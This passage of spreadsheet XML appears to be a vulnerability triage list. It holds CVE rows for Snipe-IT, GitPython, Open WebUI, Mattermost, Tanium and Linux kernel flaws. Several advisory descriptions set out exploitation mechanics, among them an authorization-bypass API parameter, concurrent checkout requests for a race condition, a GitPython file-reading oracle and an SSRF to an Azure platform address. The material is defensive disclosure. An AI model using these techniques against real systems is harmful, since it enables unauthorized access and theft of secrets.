        </is>
      </c>
      <c r="B758" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86765</t>
        </is>
      </c>
      <c r="D758" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E758" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F758" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G758" s="5" t="inlineStr"/>
      <c r="H758" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I758" s="5" t="inlineStr"/>
      <c r="J758" s="5" t="inlineStr"/>
      <c r="K758" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L758" s="5" t="inlineStr"/>
      <c r="M758" s="5" t="inlineStr"/>
      <c r="N758" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O758" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P758" s="5" t="inlineStr"/>
      <c r="Q758" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R758" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to enforce checkout authorization when assignment fields are submitted to the asset update endpoint. Authenticated users with edit permission but explicitly denied checkout permission can reassign assets, bypass check-in procedures, and alter custody records by submitting assigned_user, assigned_asset, or assigned_location parameters to PATCH /api/v1/hardware/{id}.</t>
        </is>
      </c>
      <c r="S758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86765</t>
        </is>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B759" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86766</t>
        </is>
      </c>
      <c r="D759" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E759" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F759" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G759" s="5" t="inlineStr"/>
      <c r="H759" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I759" s="5" t="inlineStr"/>
      <c r="J759" s="5" t="inlineStr"/>
      <c r="K759" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L759" s="5" t="inlineStr"/>
      <c r="M759" s="5" t="inlineStr"/>
      <c r="N759" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O759" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P759" s="5" t="inlineStr"/>
      <c r="Q759" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R759" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions up to and including 8.6.3 contain a race condition (TOCTOU) in the consumable checkout API endpoint (POST /api/v1/consumables/{consumable_id}/checkout). The requested quantity is validated against the number of remaining units before the database transaction begins, and the transaction then creates the checkout records without locking the consumable row or re-checking availability. An authenticated user with permission to check out consumables can submit concurrent checkout requests for the same consumable so that both requests pass the availability check and succeed, over-allocating stock and driving the remaining inventory negative (e.g., a consumable with 1 remaining unit ends at -1 after two concurrent 1-unit checkouts). The issue is fixed in 8.7.0, which re-fetches the parent row under lockForUpdate inside the transaction and re-validates availability.</t>
        </is>
      </c>
      <c r="S759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86766</t>
        </is>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B760" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87072</t>
        </is>
      </c>
      <c r="D760" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E760" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F760" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G760" s="5" t="inlineStr"/>
      <c r="H760" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I760" s="5" t="inlineStr"/>
      <c r="J760" s="5" t="inlineStr"/>
      <c r="K760" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L760" s="5" t="inlineStr"/>
      <c r="M760" s="5" t="inlineStr"/>
      <c r="N760" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O760" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P760" s="5" t="inlineStr"/>
      <c r="Q760" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R760" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87072</t>
        </is>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B761" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87818</t>
        </is>
      </c>
      <c r="D761" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E761" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F761" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G761" s="5" t="inlineStr"/>
      <c r="H761" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I761" s="5" t="inlineStr"/>
      <c r="J761" s="5" t="inlineStr"/>
      <c r="K761" s="5" t="inlineStr">
        <is>
          <t>gitpython_project:gitpython</t>
        </is>
      </c>
      <c r="L761" s="5" t="inlineStr"/>
      <c r="M761" s="5" t="inlineStr"/>
      <c r="N761" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O761" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P761" s="5" t="inlineStr"/>
      <c r="Q761" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R761" s="5" t="inlineStr">
        <is>
          <t>GitPython 3.1.59 fails to restrict the --no-index option in the high-level diff API, allowing attackers to read arbitrary filesystem paths as repository operands. Attackers can combine --no-index with -I/--ignore-matching-lines to create a content-dependent Boolean oracle, repeatedly querying local files to recover single-line secrets through distinguishable success or error responses.</t>
        </is>
      </c>
      <c r="S761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87818</t>
        </is>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B762" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87998</t>
        </is>
      </c>
      <c r="D762" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E762" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F762" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G762" s="5" t="inlineStr"/>
      <c r="H762" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I762" s="5" t="inlineStr"/>
      <c r="J762" s="5" t="inlineStr"/>
      <c r="K762" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L762" s="5" t="inlineStr"/>
      <c r="M762" s="5" t="inlineStr"/>
      <c r="N762" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O762" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P762" s="5" t="inlineStr"/>
      <c r="Q762" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="R762" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.1, DELETE /api/v1/knowledge/{id}/delete in backend/open_webui/routers/knowledge.py authorized deletion against the knowledge base but then removed its administrator-owned external connection without a separate administrator check or a check for other dependent knowledge bases. A non-administrator with write access to one external knowledge base could delete shared instance configuration and make every other knowledge base using that connection unavailable. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87998</t>
        </is>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B763" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87999</t>
        </is>
      </c>
      <c r="D763" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E763" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F763" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G763" s="5" t="inlineStr"/>
      <c r="H763" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I763" s="5" t="inlineStr"/>
      <c r="J763" s="5" t="inlineStr"/>
      <c r="K763" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L763" s="5" t="inlineStr"/>
      <c r="M763" s="5" t="inlineStr"/>
      <c r="N763" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O763" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P763" s="5" t="inlineStr"/>
      <c r="Q763" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R763" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. Prior to 0.11.1, POST /api/v1/retrieval/process/web and POST /api/v1/retrieval/process/web/search in backend/open_webui/retrieval/web/utils.py treated Python's globally routable address classification as proof that a destination was external. An authenticated user could make an Azure-hosted instance fetch and return content from 168.63.129.16, the Azure platform channel, as well as other reserved ranges that the standard classification did not reject. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87999</t>
        </is>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B764" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8821</t>
        </is>
      </c>
      <c r="D764" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E764" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F764" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G764" s="5" t="inlineStr"/>
      <c r="H764" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I764" s="5" t="inlineStr"/>
      <c r="J764" s="5" t="inlineStr"/>
      <c r="K764" s="5" t="inlineStr"/>
      <c r="L764" s="5" t="inlineStr"/>
      <c r="M764" s="5" t="inlineStr"/>
      <c r="N764" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O764" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P764" s="5" t="inlineStr"/>
      <c r="Q764" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R764" s="5" t="inlineStr">
        <is>
          <t>Mattermost versions 11.9.x &lt;= 11.9.0, 11.8.x &lt;= 11.8.4, 11.7.x &lt;= 11.7.7, 10.11.x &lt;= 10.11.22 fail to validate channel member-management permission during playbook run creation, allowing an authenticated channel member to add an arbitrary user to a restricted channel via the run owner field.. Mattermost Advisory ID: MMSA-2026-00677</t>
        </is>
      </c>
      <c r="S764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8821</t>
        </is>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B765" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89792</t>
        </is>
      </c>
      <c r="D765" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E765" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F765" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G765" s="5" t="inlineStr"/>
      <c r="H765" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I765" s="5" t="inlineStr"/>
      <c r="J765" s="5" t="inlineStr"/>
      <c r="K765" s="5" t="inlineStr"/>
      <c r="L765" s="5" t="inlineStr"/>
      <c r="M765" s="5" t="inlineStr"/>
      <c r="N765" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O765" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P765" s="5" t="inlineStr"/>
      <c r="Q765" s="5" t="inlineStr"/>
      <c r="R765" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: prevent out-of-bounds reads in share config responses
Validate IPC share configuration payload sizes before consuming
variable-length fields. Bound veto list parsing and account for
the separator byte when deriving the path length.</t>
        </is>
      </c>
      <c r="S765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89792</t>
        </is>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B766" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89818</t>
        </is>
      </c>
      <c r="D766" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E766" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F766" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G766" s="5" t="inlineStr"/>
      <c r="H766" s="5" t="inlineStr"/>
      <c r="I766" s="5" t="inlineStr"/>
      <c r="J766" s="5" t="inlineStr"/>
      <c r="K766" s="5" t="inlineStr"/>
      <c r="L766" s="5" t="inlineStr"/>
      <c r="M766" s="5" t="inlineStr"/>
      <c r="N766" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O766" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P766" s="5" t="inlineStr"/>
      <c r="Q766" s="5" t="inlineStr"/>
      <c r="R766" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu/vcn: fix integer overflow in dec_msg buffer count check
If the supplied msg[2] (num_buffers) is 0x3FFFFFFF, the expression
6 + num_buffers * 4 wraps to 2 and the bounds check passes, letting
the parser loop far past the end of the message BO. Triggering it
additionally requires a ~4GiB mapping so that msg[1] survives the
earlier "header does not fit in BO" check.
Rewrite the test in division form, which is overflow-free by
construction. Also update the message to reflect that msg is invalid.</t>
        </is>
      </c>
      <c r="S766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89818</t>
        </is>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B767" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89826</t>
        </is>
      </c>
      <c r="D767" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E767" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F767" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G767" s="5" t="inlineStr"/>
      <c r="H767" s="5" t="inlineStr"/>
      <c r="I767" s="5" t="inlineStr"/>
      <c r="J767" s="5" t="inlineStr"/>
      <c r="K767" s="5" t="inlineStr"/>
      <c r="L767" s="5" t="inlineStr"/>
      <c r="M767" s="5" t="inlineStr"/>
      <c r="N767" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O767" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P767" s="5" t="inlineStr"/>
      <c r="Q767" s="5" t="inlineStr"/>
      <c r="R767" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/panthor: harden firmware build-info bounds checks
panthor_fw_read_build_info() checks whether the metadata range fits in the
firmware image with hdr.meta_start + hdr.meta_size. Both fields are u32, so
the addition can wrap and let an out-of-bounds range pass validation.
The function also reads the "git_sha: " prefix without first checking that
the metadata is long enough, and meta_size == 0 can underflow the NULL
terminator index.
Use subtraction-based bounds checking and reject metadata that is too short
to contain the expected prefix and trailing NULL byte.</t>
        </is>
      </c>
      <c r="S767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89826</t>
        </is>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B768" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89838</t>
        </is>
      </c>
      <c r="D768" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E768" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F768" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G768" s="5" t="inlineStr"/>
      <c r="H768" s="5" t="inlineStr"/>
      <c r="I768" s="5" t="inlineStr"/>
      <c r="J768" s="5" t="inlineStr"/>
      <c r="K768" s="5" t="inlineStr"/>
      <c r="L768" s="5" t="inlineStr"/>
      <c r="M768" s="5" t="inlineStr"/>
      <c r="N768" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O768" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P768" s="5" t="inlineStr"/>
      <c r="Q768" s="5" t="inlineStr"/>
      <c r="R768" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: limit recovery filename logging to stored length
F2FS stores recovery filenames as a length plus a fixed-size i_name
buffer.  The buffer is not NUL-terminated, but recover_inode() and
recover_dentry() print it with %s.
For a 255-byte filename, recovery logging can read past i_name into the
following raw inode fields.
Print the name with a precision bounded by i_namelen and F2FS_NAME_LEN.</t>
        </is>
      </c>
      <c r="S768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89838</t>
        </is>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B769" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89840</t>
        </is>
      </c>
      <c r="D769" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E769" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F769" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G769" s="5" t="inlineStr"/>
      <c r="H769" s="5" t="inlineStr"/>
      <c r="I769" s="5" t="inlineStr"/>
      <c r="J769" s="5" t="inlineStr"/>
      <c r="K769" s="5" t="inlineStr"/>
      <c r="L769" s="5" t="inlineStr"/>
      <c r="M769" s="5" t="inlineStr"/>
      <c r="N769" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O769" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P769" s="5" t="inlineStr"/>
      <c r="Q769" s="5" t="inlineStr"/>
      <c r="R769" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: validate MOVE_RANGE destination size
F2FS_IOC_MOVE_RANGE checks the source range, but not the destination end
before updating i_size. A source hole can expose this: __clone_blkaddrs()
skips NULL_ADDR entries and returns success, so the caller can still extend
the destination inode with unchecked pos_out + len.
Reject destination overflow and use inode_newsize_ok() before extending
the destination inode.</t>
        </is>
      </c>
      <c r="S769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89840</t>
        </is>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B770" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89912</t>
        </is>
      </c>
      <c r="D770" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E770" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F770" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G770" s="5" t="inlineStr"/>
      <c r="H770" s="5" t="inlineStr"/>
      <c r="I770" s="5" t="inlineStr"/>
      <c r="J770" s="5" t="inlineStr"/>
      <c r="K770" s="5" t="inlineStr"/>
      <c r="L770" s="5" t="inlineStr"/>
      <c r="M770" s="5" t="inlineStr"/>
      <c r="N770" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O770" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P770" s="5" t="inlineStr"/>
      <c r="Q770" s="5" t="inlineStr"/>
      <c r="R770" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: vgic-its: Don't dereference a NULL collection on ITT save
MAPC with V=0 drops ite-&gt;collection but leaves the ITE on the device's
ITT list, and vgic_its_save_ite() dereferences it unconditionally. A
guest that issues MAPD, MAPTI and then MAPC(V=0) therefore oopses the
host when the VMM issues KVM_DEV_ARM_ITS_SAVE_TABLES to migrate it.
That sequence is UNPREDICTABLE per the architecture, but KVM already
handles the resulting state in the translate, MOVI and DISCARD paths.
Save a zeroed entry, which vgic_its_restore_ite() reads back as
invalid. Skipping the ITE instead would leave the ITT slot holding
whatever is in guest memory, and restore rejects an entry naming a
collection the restored collection table does not have.</t>
        </is>
      </c>
      <c r="S770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89912</t>
        </is>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B771" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89927</t>
        </is>
      </c>
      <c r="D771" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E771" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F771" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G771" s="5" t="inlineStr"/>
      <c r="H771" s="5" t="inlineStr"/>
      <c r="I771" s="5" t="inlineStr"/>
      <c r="J771" s="5" t="inlineStr"/>
      <c r="K771" s="5" t="inlineStr"/>
      <c r="L771" s="5" t="inlineStr"/>
      <c r="M771" s="5" t="inlineStr"/>
      <c r="N771" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O771" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P771" s="5" t="inlineStr"/>
      <c r="Q771" s="5" t="inlineStr"/>
      <c r="R771" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: x86: hyper-v: Clamp stimer deadline to avoid livelock
Fix an issue where userspace or the guest can program an Hyper-V
synthetic timer to have a deadline in the past via integer overflow,
preventing the CPU from making progress and triggering an RCU stall.
Hyper-V's SynIC exposes 4 per-vCPU synthetic timers to the
guest, which are emulated by KVM. Each is programmed through the
HV_X64_MSR_STIMERi_CONFIG and HV_X64_MSR_STIMERi_COUNT MSRs. Depending
on CONFIG, COUNT represents either the absolute expiration time or the
period of a periodic timer, both expressed in 100ns ticks. These timers
may be set both by the guest (WRMSR) and the host (KVM_SET_MSRS).
When the timer is enabled, stimer_start() translates COUNT to an
absolute monotonic deadline and arms an hrtimer. If COUNT is set to a
value close to U64_MAX, the deadline calculation can overflow.
    ktime_add_ns(ktime_now, 100 * (stimer-&gt;exp_time - time_now))
This can result in a CPU livelock. stimer_start() arms the timer
via hrtimer_start() with a deadline in the past, which causes it to
immediately fire. The stimer callback then raises KVM_RQ_HV_STIMER, with
the intention of causing KVM to deliver a synthetic interrupt on the
next vCPU guest enter.
Then, once userspace issues KVM_RUN, vcpu_enter_guest() consumes the
request, calling kvm_hv_process_stimers(). This would normally disable
the timer via stimer_expiration() once the deadline is in the past.
However, the deadline comparison is done between the KVM reference
counter and stime-&gt;exp_time, which is a big value close to U64_MAX, so
this never happens for a few thousand years.
kvm_hv_process_timers() then re-arms the timer via stimer_start(), since
it was not disabled, which again fires immediately. Before entering
the guest, kvm_vcpu_exit_request() checks kvm_request_pending(),
which returns true due to the newly raised KVM_REQ_HV_STIMER. Then
vcpu_enter_guest() aborts the guest entry, returning early into
vcpu_run(), which loops back again into vcpu_enter_guest(), restarting
the cycle.
Since there are no manual yields in this loop, a task with SCHED_FIFO
may starve RCU grace-period kthreads, which exposes the stalls found
by syzcaller:
    rcu: INFO: rcu_preempt detected stalls on CPUs/tasks:
    rcu:    (detected by 1, t=10502 jiffies, g=14269, q=1142 ncpus=2)
    rcu: All QSes seen, last rcu_preempt kthread activity 10500 (4294965239-4294954739), jiffies_till_next_fqs=1, root -&gt;qsmask 0x0
    rcu: rcu_preempt kthread starved for 10500 jiffies! g14269 f0x2 RCU_GP_WAIT_FQS(5) -&gt;state=0x0 -&gt;cpu=0
    rcu:    Unless rcu_preempt kthread gets sufficient CPU time, OOM is now expected behavior.
        ( ... )
    Call Trace:
     &lt;IRQ&gt;
     __run_hrtimer kernel/time/hrtimer.c:1773 [inline]
     __hrtimer_run_queues+0x408/0xc30 kernel/time/hrtimer.c:1841
     hrtimer_interrupt+0x45b/0xaa0 kernel/time/hrtimer.c:1903
     local_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1045 [inline]
     __sysvec_apic_timer_interrupt+0x102/0x3e0 arch/x86/kernel/apic/apic.c:1062
     instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1056 [inline]
     sysvec_apic_timer_interrupt+0xa1/0xc0 arch/x86/kernel/apic/apic.c:1056
     &lt;/IRQ&gt;
     &lt;TASK&gt;
     asm_sysvec_apic_timer_interrupt+0x1a/0x20 arch/x86/include/asm/idtentry.h:697
    RIP: 0010:__raw_spin_unlock_irqrestore include/linux/spinlock_api_smp.h:152 [inline]
    RIP: 0010:_raw_spin_unlock_irqrestore+0xa8/0x110 kernel/locking/spinlock.c:194
    Code: 74 05 e8 0b f4 5f f6 48 c7 44 24 20 00 00 00 00 9c 8f 44 24 20 f6 44 24 21 02 75 4f f7 c3 00 02 00 00 74 01 fb bf 01 00 00 00 &lt;e8&gt; 23 6b 27 f6 65 8b 05 7c 60 5a 07 85 c0 74 40 48 c7 04 24 0e 36
    RSP: 0018:ffffc900040a7320 EFLAGS: 00000206
    RAX: 5de15cb931505900 RBX: 0000000000000a06 RCX: 5de15cb931505900
    RDX: 0000000000000007 RSI: ffffffff8daa9dc3 RDI: 0000000000000001
    RBP: ffffc900040a73b0 R08: ffffffff8fc3d0
---truncated---</t>
        </is>
      </c>
      <c r="S771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89927</t>
        </is>
      </c>
    </row>
    <row r="772">
